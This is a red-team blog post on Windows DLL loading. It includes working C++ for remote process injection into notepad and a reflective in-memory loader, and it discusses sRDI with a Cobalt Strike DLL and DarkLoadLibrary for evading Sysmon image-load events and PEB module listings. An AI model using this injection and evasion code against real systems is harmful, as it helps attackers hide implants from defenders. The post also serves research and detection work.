This is an archive post back from 2021, I have since revisited it (TBD) ⚠
Introduction
Right, so, this is a bit of a long one. But I want to go over a few methods of loading DLLs into processes. Then build onto that and look into Reflective DLLs, some SysMon events associated with loading DLLs, and finally DarkLoadLibrary which could be a great alternative to bootstrapping DLLs.
Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:
For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.
The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.
Essentially, a DLL, or a Dynamic-Link Library, are libraries that contain various pieces of data and provide a modular approach to code. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:
All thats happended here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description on LoadLibraryA:
LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.
This one is a bit more complicated as it requires us to do a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. But, essentially what is happening in the following code is a sacrificial process is being created with CreateProcessA and then a given DLL is being injected. This just means that we will create a process, then inject the DLL into memory and have it load there.
The code:
voidremote_load_dll(LPCSTR path){ LPSTARTUPINFOA si =newSTARTUPINFOA(); PPROCESS_INFORMATION pi =newPROCESS_INFORMATION();if (CreateProcessA(NULL, (LPSTR)"notepad",NULL,NULL, TRUE,0,NULL,NULL, si, pi) ==NULL) {printf("[!] Failed to create process!\n");return; }else {printf(" :: Process ID: %d\n",pi->dwProcessId);printf(" :: Process Handle: %p\n",pi->hProcess);int len =strlen(path); LPVOID pAddress =VirtualAllocEx(pi->hProcess,nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);printf(" :: Base Address: %p\n", pAddress);WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len,NULL); PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
printf(" :: THREAD_START_ROUTINE: %p\n", pRoutine); HANDLE hThread =CreateRemoteThread(pi->hProcess,NULL,0, pRoutine, pAddress,0,NULL);printf(" :: Thread: %p\n", hThread);if (pi->hProcess)CloseHandle(pi->hProcess);if (pi->hThread)CloseHandle(pi->hThread);if (hThread)CloseHandle(hThread); }}
Process ID 16684 was created and injected into, loading the MessageBoxA DLL:
The issue we have here is that the DLL is being loaded from disk meaning that, in an offensive scenario, the malicious DLL will have to be written to the targets disk:
int len =strlen(path);LPVOID pAddress =VirtualAllocEx(pi->hProcess,nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len,NULL);PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"),"LoadLibraryA");HANDLE hThread =CreateRemoteThread(pi->hProcess,NULL,0, pRoutine, pAddress,0,NULL);
The debug-dll.dll can also be seen in the linked modules:
Lets look at a way of removing the requirement for on-disk DLLs to reduce the chance of being so obvious.
This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:
Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
The library's headers and sections are loaded into their new locations in memory.
The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, the entirety of the ReflectiveLoader.c is very well commented. So, between the technique explanation, and the code comments, I won't describe everything it is doing.
Lets write something malicious to demonstrate a the Reflective DLL process.
First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:
That is the DLL to be injected, so lets look at writing a tool to load this DLL into the target processes.
The Injector: Reflective Prerequisties
Before writing the actual injection mechanism, some utility functions are needed. I grabbed this via a brute-force/error-based development with the repository provided until I got the minimum functions required, which were these two:
#include<windows.h>#include<stdio.h>#defineWIN_X64#defineDEREF_32( name )*(DWORD *)(name)#defineDEREF_16( name )*(WORD *)(name)DWORDRva2Offset( DWORD dwRva,UINT_PTR uiBaseAddress ){ WORD wIndex =0; PIMAGE_SECTION_HEADER pSectionHeader =NULL; PIMAGE_NT_HEADERS pNtHeaders =NULL; pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva <pSectionHeader[0].PointerToRawData )return dwRva;for( wIndex=0 ; wIndex <pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) { if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva -pSectionHeader[wIndex].VirtualAddress +pSectionHeader[wIndex].PointerToRawData ); }return0;}DWORDGetReflectiveLoaderOffset( VOID* lpReflectiveDllBuffer ){ UINT_PTR uiBaseAddress =0; UINT_PTR uiExportDir =0; UINT_PTR uiNameArray =0; UINT_PTR uiAddressArray =0; UINT_PTR uiNameOrdinals =0; DWORD dwCounter =0;#ifdefWIN_X64 DWORD dwCompiledArch =2;#else // This will catch Win32 and WinRT. DWORD dwCompiledArch =1;#endif uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; // get the File Offset of the modules NT Header uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; // currenlty we can only process a PE file which is the same type as the one this fuction has // been compiled as, due to various offset in the PE structures being defined at compile time.if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic ==0x010B ) // PE32 {if( dwCompiledArch !=1 )return0; }elseif( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic ==0x020B ) // PE64 {if( dwCompiledArch !=2 )return0; }else {return0; } // uiNameArray = the address of the modules export directory entry uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory uiExportDir = uiBaseAddress +Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); // get the File Offset for the array of name pointers uiNameArray = uiBaseAddress +Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); // get the File Offset for the array of addresses uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions... dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; // loop through all the exported functions to find the ReflectiveLoaderwhile( dwCounter-- ) {char* cpExportedFunctionName = (char*)(uiBaseAddress +Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));if( strstr( cpExportedFunctionName,"ReflectiveLoader" ) !=NULL ) { // get the File Offset for the array of addresses uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers uiAddressArray += ( DEREF_16( uiNameOrdinals ) *sizeof(DWORD) ); // return the File Offset to the ReflectiveLoader() functions code...returnRva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); } // get the next exported function name uiNameArray +=sizeof(DWORD); // get the next exported function name ordinal uiNameOrdinals +=sizeof(WORD); }return0;}
Again, the code is very well commented. But the two functions:
Rva2Offset:
Convert the Relative Virtual Address (RVA) to an offset which can be used to find the entry-point later on.
GetReflectiveLoaderOffset:
Does what it says on the tin, looks for the Reflective Loaders offset with the Rva2Offset function.
With that done, lets look at getting a DLL into memory. At first, I did it the old xxd way but the DLL came out to be 90,000 bytes which was killing Visual Studio. So, I opted for a method of reading the bytes into an LPVOID which is basically the same format it would be in anyway!
intmain(void){ const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";
LPVOID buf; DWORD bufSz =ReadBytes((char*)path,&buf); LPVOID pAddress =nullptr; BOOL bProtect; HANDLE hThread; DWORD lpflOldProtect =0; DWORD dwLdrOffset =0; pAddress =VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);RtlMoveMemory(pAddress, buf, bufSz); bProtect =VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ,&lpflOldProtect); dwLdrOffset =GetReflectiveLoaderOffset(buf); LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset); hThread =CreateThread(0,0, lpStartAddress,0,0,0);Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.WaitForSingleObject(hThread, INFINITE);}
Executing this:
There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address as provided by VirtualAlloc. But this time it uses the GetReflectiveLoaderOffset function to determine the entry-point for the exported function.
The Injector: Remote
This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:
Executing this, notepad spawns and is injected into:
Investigating the loads
Now that we've looked at both a standard, and a reflective DLL. Lets inspect the loads. Below is a screenshot of the of the Reflective DLL being loaded from memory and no reflective-debug-dll.dll can be seen in the linked modules:
It makes sense, we're executing a DLL from a bootstrapped entry-point, meaning its not a traditional DLL. Well, does it comply with the expected Kernel Callbacks from the PsSetLoadImageNotifyRoutine function?
First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. The event ID for this is 7, below is the relevant config segment:
As we know that the on-disk loader loads DLLs as Windows expects, we can use that to verify if Sysmon is working as correctly. The screenshow below shows the on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):
A bunch of Image loaded events are found.
To look up the event in more detail, Event Viewer can be used by going to the follow path:
Applications and ServicesLogs->Microsoft->Windows->Sysmon->Operational
Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:
This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.
x64dbg tangent
First thing I want to look at is the DLL in memory, loading it up in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the PE Magic bytes, MZ. Checking the base address VirtualAlloc returns matches up with the printed statement, and the RBP Register, following this into a dump, the full DOS Header can be seen:
Dumping the memory to disk:
Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:
To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:
Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )
Where REFLDR_NAME is:
#defineREFLDR_NAME ReflectiveLoader
Bit of a tangent, but cool nonetheless.
An Improved Reflective DLL
Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:
It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.
The article does a great job of detailing the improvements, so I won't repeat it here, but I just wanted to address those improvements have been made on this technique since it was initially identified.
Shellcode Reflective DLL Injection
Everything achieved so far has required access to the source code to compile the reflective loader component into it. To achieve that, a project called sRDI exists. sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how the project works. But, essentially, it is this:
To quote the blog directly:
When execution starts at the top of the bootstrap, the general flow looks like this:
Get current location in memory (Bootstrap)
Calculate and setup registers (Bootstrap)
Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
Un-pack DLL and remap sections (RDI)
Call DLLMain (RDI)
Call exported function by hashed name (RDI) – Optional
Pass user-data to exported function (RDI) – Optional
As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:
usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll
RDI Shellcode Converter
positional arguments:
input_dll DLL to convert to shellcode
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-f FUNCTION_NAME, --function-name FUNCTION_NAME
The function to call after DllMain
-u USER_DATA, --user-data USER_DATA
Data to pass to the target function
-c, --clear-header Clear the PE header on load
-i, --obfuscate-imports
Randomize import dependency load order
-d IMPORT_DELAY, --import-delay IMPORT_DELAY
Number of seconds to pause between loading imports
There are some really cool pieces of functionaliy here, so I recommend taking a look through ShellcodeRDI.py, but thats not in scope for now.
The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:
Running sRDI and specifying Start as the FUNCTION_NAME:
This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:
Running this code shows notepad.exe being injected into and the DLL being executed:
Similarly to the Reflective DLL, no linked DLL is shown:
Recap
A few tangents later, what has actually occurred. So far:
Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.
Poked around some Reflective DLLs
Looked at sRDI and created a little POC.
Moving on!
DarkLoadLibrary
A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.
What makes this interesting is the following table from the blog:
As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interactions right out of the box, which is fine. We will work with that. According to the table, however, there's probably not any reason to avoid it, it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.
It loads TestDLL.dll and calls ThisIsAFunction. Simples.
Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):
Depending on the options provided, DarkLoadLibrary will do a few things:
IsValidPE(): Checks to see if e_lfanew is in the IMAGE_NT_HEADERS. If it is, check if the Signature is IMAGE_NT_SIGNATURE.
MapSections(): This function does a lot, and is worth a read, but essentially it is mapping the DLL Sections and ensure that all the relocations are handled correctly.
ResolveImports(): Does what is says on the tin. Resolves LoadLibraryA and ensures the DLL has all its imports correctly resolved.
BeginExecution(): This is the actual point of execution, and again, a lot is going on here and is worth reading. But, the purpose of this is the following:
BOOL ok =DllMain( (HINSTANCE)pdModule->ModuleBase, DLL_PROCESS_ATTACH, (LPVOID)NULL);
Experimenting with DarkLoadLibrary
The little tool I put together for this is dark-loader. It works off both modes offered for loading a DLL, and then takes in a DLL path. This allowed me to quickly verify various DLLs worked with the libary.
Here is the help:
Lets quickly make sure it works across all the use cases:
Standard DLL: LOAD_LOCAL_FILE
Reflective DLL: LOAD_LOCAL_FILE
Standard DLL: LOAD_MEMORY
Reflective DLL: LOAD_MEMORY
DarkLoadLibrary was able to execute both the standard and Reflective DLL from both the local disk and from memory without any issues!
ImageLoad and Linked Modules
The final thing I want to do is quickly go back over the Sysmon Event ID 7 and the PEB Linked Modules.
Updating the PowerShell script for the $loader and the $dll:
The next screenshot provides no reason to believe this is correct, but no events were found:
The only other way I could prove this is to provide logs or an awkward screenshot of times. But I can't be bothered, so trust me bro.
Checking the linked modules, debug-dll.dll is present:
DarkLoadLibrary also supports NO_LINK, which should remove the above:
dwFlags = LOAD_LOCAL_FILE | NO_LINK;
The DLL executes and the debug-dll cannot be seen:
LOAD_MEMORY
Again, no logs found, but trust me bro:
Arbitrary DLL Naming:
Conclusion
Throughout this blog I've been exploring loading DLLs into memory. This covered loading a standard Windows DLL, a custom DLL (MessageBoxA ftw), and Reflective DLLs. My goal was to identify an OpSec way of loading modules into memory and the conclusion I've came to is that if the DLL needs to be loaded into a remote process, then the sRDI project (or something similar) is probably the best way. As for the local process, I cannot see any reason to not take inspiration from BatSec's DarkLoadLibrary and utilise a custom loader. The flexibility to load from both disk and memory, as well as supplying a 'spoofed' module name, currently, seems unparalleled.
Hopefully I get around to it, but I want to do a follow-up blog to this where I go over a project I've had for a while which piles onto the C2 Twitter debate by showcasing a method of keeping a small implant that works well with modularity.